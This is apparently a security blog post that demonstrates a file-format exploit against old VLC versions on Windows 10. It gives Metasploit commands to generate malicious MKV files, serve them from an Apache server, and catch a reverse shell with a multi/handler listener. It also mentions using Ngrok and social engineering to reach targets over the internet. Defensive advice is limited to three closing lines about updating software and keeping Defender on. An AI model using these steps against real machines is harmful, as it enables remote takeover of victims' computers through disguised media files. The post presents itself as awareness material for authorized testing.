Protecting Your Computer from Security Risks Involving Fake Videos — Security Advice
NOTE: Hello, this blog post has been written for the purpose of education and raising awareness about information security. It is essential to use authorized legal methods (White Box Test, Grey Box Test) as mentioned in this post. Our main focus is on the security advice section. Be sure to read that part.
Hello everyone, I will talk about how cyber criminals hack computers with fake videos in a blog post.
System : Kali GNU/Linux 2021.3
Target System : Windows 10 Pro [Version 10.0.17763.1]
Affected VLC Media Player Versions : < = 2.2.8
For example, we will examine the ‘exploit/windows/fileformat/vlc_mkv’ vulnerability target using the Metasploit tool.
This vulnerability exists in the parsing of MKV files in VLC Media Player, following commands are run the exploit.(Figure 1)
Terminal :
msfconsole
use exploit/windows/fileformat/vlc_mkv
set LHOST <Cyber Attacker’s Local Ip Address>
exploit
We see two created mkv files.(dylpa-part1.mkv, dylpa-part2.mkv) part1.mkv is executable malware file.
Start the Apache2 web server for target. Terminal commands are below. (Figure 2)
Terminal:
systemctl start apache2
systemctl status apache2
Malware file (part1) and other helper file (part2) are move Apache2 Web Server directory.
Terminal:
mv <Metasploit VLC Malware Files Directory> <Apache2 Web Server Directory>
Now, run metasploit handler module for backconnect. We will select windows/x64/shell/reverse_tcp payload.
Terminal :
use exploit/multi/handler
set payload windows/x64/shell/reverse_tcp
set LHOST <Cyber Attacker’s Local Ip Address>
run
Target, downloads malware files from cyber attacker’s local ip address.(Figure 5) This part includes social engineering. Cyber criminals can use Ngrok services for WAN network attack. This scenario only tested on local virtual environment.
Target, clicks “Play Button” after running the malware file. (dylpa-part1.mkv) Windows Defender is turned off for this scenario.(Figure 6)
As a result, reverse shell is take.(Figure 7)
Security Advices
- If we are using VLC Media Player 2.2.8 and previous versions, we should update to the latest version.
- If we are using Windows 10 Version 1809 and previous versions, we should update to the latest version.
- Windows operating system should be update and we must sure that Windows defender is on.
Resources
1- https://www.rapid7.com/db/modules/exploit /windows/fileformat/vlc_mkv
3-https://vulners.com/metasploit/MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_MKV
